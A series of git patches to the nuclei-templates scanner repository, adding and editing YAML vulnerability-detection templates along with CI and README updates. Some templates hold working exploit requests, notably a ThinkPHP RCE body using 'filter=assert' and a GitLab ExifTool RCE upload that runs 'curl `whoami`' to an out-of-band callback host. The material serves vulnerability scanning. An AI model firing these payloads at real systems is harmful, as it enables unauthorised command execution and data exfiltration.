vulnerabilities/wordpress/wp-tinymce-lfi.yaml index 33592aa212..3b5ed8a2b9 100644 --- a/vulnerabilities/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml +++ b/vulnerabilities/wordpress/wp-tinymce-lfi.yaml @@ -1,11 +1,14 @@ -id: wp-tinymce-thumbnail-plugin-lfi +id: wp-tinymce-lfi info: name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI author: 0x_Akoko severity: high - tags: wordpress,wp-theme,lfi,wordpress - reference: https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400 + description: The Tinymce Thumbnail Gallery WordPress plugin was affected by a download-image.php Local File Inclusion security vulnerability. + reference: + - https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400 + - http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/ + tags: wordpress,wp-theme,lfi,wordpress,tinymce requests: - method: GET @@ -16,10 +19,10 @@ requests: matchers: - type: word part: body - condition: and words: - "DB_NAME" - "DB_PASSWORD" + condition: and - type: status status: From 659f61ca537ea2d3a65a4a323da330b54235ff78 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 27 Oct 2021 00:17:42 +0530 Subject: [PATCH 3232/4083] Create thinkphp-501-rce.yaml --- .../thinkphp/thinkphp-501-rce.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 vulnerabilities/thinkphp/thinkphp-501-rce.yaml diff --git a/vulnerabilities/thinkphp/thinkphp-501-rce.yaml b/vulnerabilities/thinkphp/thinkphp-501-rce.yaml new file mode 100644 index 0000000000..a9a21e4fd7 --- /dev/null +++ b/vulnerabilities/thinkphp/thinkphp-501-rce.yaml @@ -0,0 +1,27 @@ +id: thinkphp-501-rce + +info: + name: ThinkPHP 5.0.1 RCE + author: lark-lab + severity: critical + tags: thinkphp,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/?s=index/index/index" + body: "s=phpinfo()&_method=__construct&filter=assert" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + + - type: status + status: + - 200 From a6c30a86a98a6ba922245c8b18ca357c04ceed38 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 26 Oct 2021 18:48:07 +0000 Subject: [PATCH 3233/4083] Auto README Update [Tue Oct 26 18:48:07 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c3857fb33d..75ccce2154 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**177 directories, 2447 files**. +**177 directories, 2454 files**. </td> </tr> From 8e730ca455e7e8dba4117c5a1e5659acb48c4377 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 27 Oct 2021 00:25:22 +0530 Subject: [PATCH 3234/4083] Create dwsync-exposure.yaml --- exposures/files/dwsync-exposure.yaml | 31 ++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposures/files/dwsync-exposure.yaml diff --git a/exposures/files/dwsync-exposure.yaml b/exposures/files/dwsync-exposure.yaml new file mode 100644 index 0000000000..feb4ad43dc --- /dev/null +++ b/exposures/files/dwsync-exposure.yaml @@ -0,0 +1,31 @@ +id: dwsync-exposure + +info: + name: Dwsync.xml Exposure + author: KaizenSecurity + severity: info + description: The dwsync.xml file is a file generated by Dreamweaver. Where the file contains information related to what files are in the website directory. + tags: dwsync,exposure,dreamweaver + +requests: + - method: GET + path: + - "{{BaseURL}}/_notes/dwsync.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - application/xml + + - type: word + part: body + words: + - '<dwsync>' + - '</dwsync>' + condition: and From e6d40037c5924d68be1ea589808b3d7e341417c5 Mon Sep 17 00:00:00 2001 From: Chill3d <Chill3d@users.noreply.github.com> Date: Wed, 27 Oct 2021 10:30:43 +0200 Subject: [PATCH 3235/4083] Typo on rocketchat tag --- cves/2020/CVE-2020-28208.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-28208.yaml b/cves/2020/CVE-2020-28208.yaml index 135292b076..5e34ccde4a 100644 --- a/cves/2020/CVE-2020-28208.yaml +++ b/cves/2020/CVE-2020-28208.yaml @@ -6,7 +6,7 @@ info: severity: medium description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1. reference: https://trovent.io/security-advisory-2010-01 - tags: cve,cve2020,rockethchat + tags: cve,cve2020,rocketchat classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.30 From 6958702edd15ae2cda6115472dfcd5c281d1a008 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Wed, 27 Oct 2021 15:17:08 +0530 Subject: [PATCH 3236/4083] Update wix-takeover.yaml --- takeovers/wix-takeover.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/takeovers/wix-takeover.yaml b/takeovers/wix-takeover.yaml index 2b1a07b3ca..854916610d 100644 --- a/takeovers/wix-takeover.yaml +++ b/takeovers/wix-takeover.yaml @@ -1,10 +1,11 @@ id: wix-takeover info: - name: wix takeover detection - author: harshinsecurity - severity: medium - tags: takeover + author: harshinsecurity,philippedelteil + description: This subdomain take over would only work on an edge case when the account was deleted. You will need a premium account (~ US$7) to test the take over. + severity: high + tags: takeover,wix + reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/231 requests: - method: GET @@ -14,8 +15,11 @@ requests: matchers-condition: and matchers: - type: word + condition: or words: - 'Error ConnectYourDomain occurred' + - 'wixErrorPagesApp' + - type: status status: - - 404 + - 404 \ No newline at end of file From e7b0645decb999b84864be38a9467c43f8729891 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Wed, 27 Oct 2021 15:27:46 +0530 Subject: [PATCH 3237/4083] Update cname-service-detection.yaml --- dns/cname-service-detection.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/dns/cname-service-detection.yaml b/dns/cname-service-detection.yaml index 20997548e8..2e16efc356 100644 --- a/dns/cname-service-detection.yaml +++ b/dns/cname-service-detection.yaml @@ -11,7 +11,7 @@ dns: type: CNAME class: inet recursion: true - retries: 5 + retries: 3 matchers-condition: or matchers: @@ -29,7 +29,8 @@ dns: name: announcekit words: - "cname.announcekit.app" - - type: word - name: wix - words: - - "wixdns.net" + + - type: word + name: wix + words: + - "wixdns.net" From 7508bafe6426d9e708e0f2a0d14c93be89205f03 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Wed, 27 Oct 2021 15:34:35 +0530 Subject: [PATCH 3238/4083] Adding binary cache --- .github/workflows/template-validate.yml | 18 ++++++++---------- 1 file changed, 8 insertions(+), 10 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 705f870c7e..33e2653241 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -11,21 +11,19 @@ jobs: with: go-version: 1.17 - #- name: Cache Go - # id: cache-go - # uses: actions/cache@v2 - # with: - # path: /home/runner/go - # key: ${{ runner.os }}-go + - name: Cache Go + id: cache-go + uses: actions/cache@v2 + with: + path: /home/runner/go + key: ${{ runner.os }}-go - name: Installing Nuclei - # if: steps.cache-go.outputs.cache-hit != 'true' + if: steps.cache-go.outputs.cache-hit != 'true' run: | go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest - shell: bash - name: Template Validation run: | nuclei -validate -t . - nuclei -validate -w ./workflows - shell: bash \ No newline at end of file + nuclei -validate -w ./workflows \ No newline at end of file From d5d2ed0a0ecaa34c684389d0ba815907f0228a0f Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Wed, 27 Oct 2021 13:52:34 +0300 Subject: [PATCH 3239/4083] Add description --- vulnerabilities/other/sangfor-edr-rce.yaml | 1 + vulnerabilities/other/twig-php-ssti.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/vulnerabilities/other/sangfor-edr-rce.yaml b/vulnerabilities/other/sangfor-edr-rce.yaml index 7c5966f8a2..997f107b6f 100644 --- a/vulnerabilities/other/sangfor-edr-rce.yaml +++ b/vulnerabilities/other/sangfor-edr-rce.yaml @@ -4,6 +4,7 @@ info: name: Sangfor EDR 3.2.17R1/3.2.21 RCE author: pikpikcu severity: critical + description: A vulnerability in Sangfor EDR product allows remote unauthenticated users to cause the product to execute arbitrary commands. reference: https://www.cnblogs.com/0day-li/p/13650452.html tags: rce diff --git a/vulnerabilities/other/twig-php-ssti.yaml b/vulnerabilities/other/twig-php-ssti.yaml index 8b113641a5..74355ae13b 100644 --- a/vulnerabilities/other/twig-php-ssti.yaml +++ b/vulnerabilities/other/twig-php-ssti.yaml @@ -4,6 +4,7 @@ info: name: Twig PHP <2.4.4 template engine - SSTI author: madrobot severity: high + description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability. tags: php,ssti requests: From f1cf6fd9a72d8448b14be47564e93db9f36d438a Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Wed, 27 Oct 2021 14:03:22 +0300 Subject: [PATCH 3240/4083] Add description --- vulnerabilities/other/WooYun-2015-148227.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/WooYun-2015-148227.yaml b/vulnerabilities/other/WooYun-2015-148227.yaml index f15f8d3432..fba7ec1520 100644 --- a/vulnerabilities/other/WooYun-2015-148227.yaml +++ b/vulnerabilities/other/WooYun-2015-148227.yaml @@ -3,6 +3,7 @@ info: name: Seeyon WooYun LFR author: princechaddha severity: high + description: A vulnerability in Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker. reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html tags: seeyon,wooyun,lfi From 3a02b7c3252d6f99e37aa3edee3d9beb9507727f Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Wed, 27 Oct 2021 14:04:00 +0300 Subject: [PATCH 3241/4083] Add description --- vulnerabilities/other/turbocrm-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/turbocrm-xss.yaml b/vulnerabilities/other/turbocrm-xss.yaml index 88e7d47165..a44e962186 100644 --- a/vulnerabilities/other/turbocrm-xss.yaml +++ b/vulnerabilities/other/turbocrm-xss.yaml @@ -4,6 +4,7 @@ info: name: TurboCRM XSS author: pikpikcu severity: medium + description: A vulnerability in TurboCRM allows remote attackers to inject arbitrary Javascript into the response returned by the application. reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a tags: xss,turbocrm From 14ae8e3f598cddc64d42d8bf1f79f6fc266bc449 Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Wed, 27 Oct 2021 14:05:11 +0300 Subject: [PATCH 3242/4083] Add description --- vulnerabilities/other/php-zerodium-backdoor-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml index 6d4c304b0f..a257806c57 100644 --- a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml +++ b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml @@ -3,6 +3,7 @@ id: php-zerodium-backdoor-rce info: name: PHP Zerodium Backdoor RCE author: dhiyaneshDk + description: A backdoor has been introduced into PHP, dubbed 'zerodiumvar_dump', the backdoor allowed the execution of arbitrary PHP code. reference: https://news-web.php.net/php.internals/113838 severity: critical tags: php,backdoor From 9848f92894f38bfadc942483a579f35787813778 Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Wed, 27 Oct 2021 14:06:15 +0300 Subject: [PATCH 3243/4083] Add description --- vulnerabilities/other/rconfig-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml index 00bc474218..0d32e296d5 100644 --- a/vulnerabilities/other/rconfig-rce.yaml +++ b/vulnerabilities/other/rconfig-rce.yaml @@ -5,6 +5,7 @@ info: author: dwisiswant0 severity: high tags: rconfig,rce + description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint. reference: - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - https://www.exploit-db.com/exploits/48878 From 376c63189d7627145057cb6cac5e40c3baf96def Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Wed, 27 Oct 2021 14:07:22 +0300 Subject: [PATCH 3244/4083] Add description --- cves/2018/CVE-2018-9845.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-9845.yaml b/cves/2018/CVE-2018-9845.yaml index 996b77a31d..9b9b600503 100644 --- a/cves/2018/CVE-2018-9845.yaml +++ b/cves/2018/CVE-2018-9845.yaml @@ -4,6 +4,7 @@ info: name: Etherpad Lite before 1.6.4 is exploitable for admin access. author: philippedelteil severity: critical + description: Etherpad Lite before 1.6.4 is exploitable for admin access. reference: - https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4 - https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b From 70c90bba845ac22c433af123a103561c2f91ba2c Mon Sep 17 00:00:00 2001 From: meme-lord <17912559+meme-lord@users.noreply.github.com> Date: Wed, 27 Oct 2021 12:45:18 +0100 Subject: [PATCH 3245/4083] Added CVE-2017-0929 (DNN SSRF) --- cves/2017/CVE-2017-0929.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 cves/2017/CVE-2017-0929.yaml diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml new file mode 100644 index 0000000000..ea6e1204e4 --- /dev/null +++ b/cves/2017/CVE-2017-0929.yaml @@ -0,0 +1,18 @@ +id: CVE-2017-0929 +info: + name: DotNetNuke ImageHandler SSRF (CVE-2017-0929) + severity: medium + reference: + - https://hackerone.com/reports/482634 + author: CharanRayudu, meme-lord + tags: cve,cve2017,ssrf,dotnetnuke + +requests: + - method: GET + path: + - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url={{interactsh-url}}' + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" From 46321e321c86bb36a2137b28f9c4f5d02235dae2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 27 Oct 2021 12:05:42 +0000 Subject: [PATCH 3246/4083] Auto Generated CVE annotations [Wed Oct 27 12:05:42 UTC 2021] :robot: --- cves/2017/CVE-2017-0929.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml index ea6e1204e4..ebe7ad1e9c 100644 --- a/cves/2017/CVE-2017-0929.yaml +++ b/cves/2017/CVE-2017-0929.yaml @@ -1,11 +1,17 @@ id: CVE-2017-0929 info: name: DotNetNuke ImageHandler SSRF (CVE-2017-0929) - severity: medium + severity: high reference: - https://hackerone.com/reports/482634 author: CharanRayudu, meme-lord tags: cve,cve2017,ssrf,dotnetnuke + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-0929 + cwe-id: CWE-918 + description: "DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources." requests: - method: GET From 6490a968b37c03014d804bb4b6423a06b0f59967 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Wed, 27 Oct 2021 18:01:04 +0530 Subject: [PATCH 3247/4083] Added GitLab CE/EE Unauthenticated RCE using ExifTool (CVE-2021-22205) --- cves/2021/CVE-2021-22205.yaml | 62 +++++++++++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 cves/2021/CVE-2021-22205.yaml diff --git a/cves/2021/CVE-2021-22205.yaml b/cves/2021/CVE-2021-22205.yaml new file mode 100644 index 0000000000..d70718eb42 --- /dev/null +++ b/cves/2021/CVE-2021-22205.yaml @@ -0,0 +1,62 @@ +id: CVE-2021-22205 + +info: + name: GitLab CE/EE Unauthenticated RCE using ExifTool + author: pdteam + severity: critical + description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. + reference: + - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ + - https://hackerone.com/reports/1154542 + - https://nvd.nist.gov/vuln/detail/CVE-2021-22205 + tags: cve,cve2021,gitlab,rce,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.90 + cve-id: CVE-2021-22205 + cwe-id: CWE-20 + +requests: + - raw: + - | + GET /users/sign_in HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + POST /uploads/user HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5 + X-CSRF-Token: {{csrf-token}} + + {{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - 'Failed to process image' + + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: status + status: + - 422 + + extractors: + - type: regex + name: csrf-token + internal: true + group: 1 + regex: + - 'csrf-token" content="(.*?)" />\n\n<meta' + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-z0-9]+)\.([a-z0-9]+)\.interactsh\.com' \ No newline at end of file From afbd9684af7e139ed3dfc51b835b1a653701d7ea Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 27 Oct 2021 12:31:36 +0000 Subject: [PATCH 3248/4083] Auto README Update [Wed Oct 27 12:31:36 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 75ccce2154..1466ea7643 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**177 directories, 2454 files**. +**178 directories, 2458 files**. </td> </tr> From 2d19236680fcf292c43734d6d524464396d294ae Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Wed, 27 Oct 2021 18:21:06 +0530 Subject: [PATCH 3249/4083] misc update --- cves/2021/CVE-2021-22205.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-22205.yaml b/cves/2021/CVE-2021-22205.yaml index d70718eb42..ba3b336ab1 100644 --- a/cves/2021/CVE-2021-22205.yaml +++ b/cves/2021/CVE-2021-22205.yaml @@ -56,6 +56,7 @@ requests: - 'csrf-token" content="(.*?)" />\n\n<meta' - type: regex + name: whoami part: interactsh_request group: 1 regex: From 0462988ca237360eb507da7c219fb1e54b9d7301 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 27 Oct 2021 13:19:45 +0000 Subject: [PATCH 3250/4083] Auto README Update [Wed Oct 27 13:19:45 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1466ea7643..c5a55a6c3c 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**178 directories, 2458 files**. +**178 directories, 2459 files**. </td> </tr> From 7ea69a963f2ae9eb6ff0a704b63024ce5603e968 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Wed, 27 Oct 2021 18:54:12 +0530 Subject: [PATCH 3251/4083] workflow fix --- .github/workflows/templates-stats.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 6132ebfa0b..ae4e49a7b8 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -1,13 +1,11 @@ name: 🗒 Templates Stats on: - create: workflow_dispatch: jobs: build: runs-on: ubuntu-latest - if: ${{ startsWith(github.ref, 'refs/tags/v') }} steps: - uses: actions/checkout@master - uses: actions/setup-go@v2 From 9295b44c7946f9713e12640b1846f854b5e09720 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 27 Oct 2021 13:25:05 +0000 Subject: [PATCH 3252/4083] Auto Generated Templates Stats [Wed Oct 27 13:25:05 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1860 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 958 insertions(+), 924 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 2041694d06..37d4d126a4 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":838},{"name":"lfi","count":344},{"name":"panel","count":284},{"name":"xss","count":259},{"name":"wordpress","count":255},{"name":"exposure","count":245},{"name":"rce","count":215},{"name":"tech","count":196},{"name":"wp-plugin","count":178},{"name":"cve2020","count":166},{"name":"cve2021","count":157},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"config","count":99},{"name":"cve2019","count":98},{"name":"cve2018","count":92},{"name":"iot","count":79},{"name":"apache","count":73},{"name":"oast","count":70},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":44},{"name":"ssrf","count":42},{"name":"sqli","count":40},{"name":"","count":39},{"name":"cve2016","count":38},{"name":"redirect","count":38},{"name":"oracle","count":37},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":29},{"name":"cve2015","count":29},{"name":"jira","count":29},{"name":"listing","count":27},{"name":"cisco","count":27},{"name":"cve2014","count":27},{"name":"auth-bypass","count":24},{"name":"generic","count":24},{"name":"disclosure","count":23},{"name":"misc","count":23},{"name":"misconfig","count":23},{"name":"router","count":22},{"name":"aem","count":19},{"name":"cve2012","count":18},{"name":"springboot","count":18},{"name":"sap","count":18},{"name":"debug","count":17},{"name":"php","count":15},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"weblogic","count":15},{"name":"cve2009","count":14},{"name":"fuzz","count":14},{"name":"login","count":14},{"name":"struts","count":14},{"name":"aws","count":14},{"name":"zoho","count":13},{"name":"android","count":13},{"name":"deserialization","count":13},{"name":"adobe","count":13},{"name":"dlink","count":13},{"name":"dns","count":13},{"name":"wp-theme","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"magento","count":11},{"name":"xxe","count":11},{"name":"cve2013","count":11},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"intrusive","count":10},{"name":"vmware","count":9},{"name":"kubernetes","count":9},{"name":"ftp","count":9},{"name":"fastjson","count":8},{"name":"backup","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"cve2008","count":8},{"name":"ruijie","count":8},{"name":"nginx","count":8},{"name":"gitlab","count":8},{"name":"ibm","count":8},{"name":"microsoft","count":8},{"name":"rails","count":8},{"name":"scada","count":8},{"name":"confluence","count":7},{"name":"cms","count":7},{"name":"files","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"phpmyadmin","count":6},{"name":"camera","count":6},{"name":"jetty","count":6},{"name":"drupal","count":6},{"name":"lucee","count":6},{"name":"django","count":6},{"name":"citrix","count":6},{"name":"fileupload","count":6},{"name":"nodejs","count":6},{"name":"prometheus","count":6},{"name":"solr","count":6},{"name":"laravel","count":6},{"name":"api","count":6},{"name":"docker","count":6},{"name":"rconfig","count":6},{"name":"wso2","count":5},{"name":"crlf","count":5},{"name":"java","count":5},{"name":"windows","count":5},{"name":"dedecms","count":5},{"name":"printer","count":5},{"name":"symfony","count":5},{"name":"tomcat","count":5},{"name":"jolokia","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"circarlife","count":5},{"name":"headless","count":5},{"name":"artifactory","count":4},{"name":"fatpipe","count":4},{"name":"proxy","count":4},{"name":"zimbra","count":4},{"name":"maps","count":4},{"name":"keycloak","count":4},{"name":"rfi","count":4},{"name":"asp","count":4},{"name":"amazon","count":4},{"name":"hongdian","count":4},{"name":"microstrategy","count":4},{"name":"resin","count":4},{"name":"vpn","count":4},{"name":"magmi","count":4},{"name":"firebase","count":4},{"name":"exchange","count":4},{"name":"grafana","count":4},{"name":"webserver","count":4},{"name":"slack","count":4},{"name":"samsung","count":4},{"name":"thinkcmf","count":4},{"name":"buffalo","count":4},{"name":"moodle","count":4},{"name":"strapi","count":4},{"name":"firmware","count":4},{"name":"symantec","count":4},{"name":"npm","count":4},{"name":"glpi","count":4},{"name":"traversal","count":4},{"name":"thinkphp","count":4},{"name":"solarwinds","count":4},{"name":"zabbix","count":4},{"name":"elastic","count":4},{"name":"git","count":4},{"name":"tikiwiki","count":3},{"name":"httpd","count":3},{"name":"cve2007","count":3},{"name":"vbulletin","count":3},{"name":"telerik","count":3},{"name":"openam","count":3},{"name":"lfr","count":3},{"name":"cacti","count":3},{"name":"jeesns","count":3},{"name":"bigip","count":3},{"name":"minio","count":3},{"name":"azure","count":3},{"name":"search","count":3},{"name":"exposures","count":3},{"name":"ebs","count":3},{"name":"r-seenet","count":3},{"name":"openssh","count":3},{"name":"node","count":3},{"name":"springcloud","count":3},{"name":"druid","count":3},{"name":"github","count":3},{"name":"backdoor","count":3},{"name":"kafka","count":3},{"name":"caucho","count":3},{"name":"opensis","count":3},{"name":"ssh","count":3},{"name":"sonicwall","count":3},{"name":"log","count":3},{"name":"jellyfin","count":3},{"name":"itop","count":3},{"name":"kevinlab","count":3},{"name":"fanruan","count":3},{"name":"nosqli","count":3},{"name":"cves","count":3},{"name":"oa","count":3},{"name":"fpd","count":3},{"name":"nexus","count":3},{"name":"linkerd","count":3},{"name":"bitrix","count":3},{"name":"cloud","count":3},{"name":"mail","count":3},{"name":"mongodb","count":3},{"name":"smtp","count":3},{"name":"lansweeper","count":3},{"name":"zhiyuan","count":3},{"name":"hoteldruid","count":3},{"name":"ofbiz","count":3},{"name":"nacos","count":3},{"name":"kibana","count":3},{"name":"targa","count":3},{"name":"terramaster","count":3},{"name":"injection","count":3},{"name":"hasura","count":2},{"name":"commax","count":2},{"name":"horde","count":2},{"name":"dolibarr","count":2},{"name":"spark","count":2},{"name":"waf","count":2},{"name":"text","count":2},{"name":"nextcloud","count":2},{"name":"openvpn","count":2},{"name":"pega","count":2},{"name":"rstudio","count":2},{"name":"globalprotect","count":2},{"name":"harbor","count":2},{"name":"bucket","count":2},{"name":"aviatrix","count":2},{"name":"axis","count":2},{"name":"akamai","count":2},{"name":"ilo","count":2},{"name":"jsf","count":2},{"name":"dos","count":2},{"name":"phpcollab","count":2},{"name":"places","count":2},{"name":"openfire","count":2},{"name":"mida","count":2},{"name":"wordfence","count":2},{"name":"seeyon","count":2},{"name":"ecoa","count":2},{"name":"s3","count":2},{"name":"nagios","count":2},{"name":"linux","count":2},{"name":"wuzhicms","count":2},{"name":"voipmonitor","count":2},{"name":"maian","count":2},{"name":"shellshock","count":2},{"name":"ecology","count":2},{"name":"webcam","count":2},{"name":"kentico","count":2},{"name":"jboss","co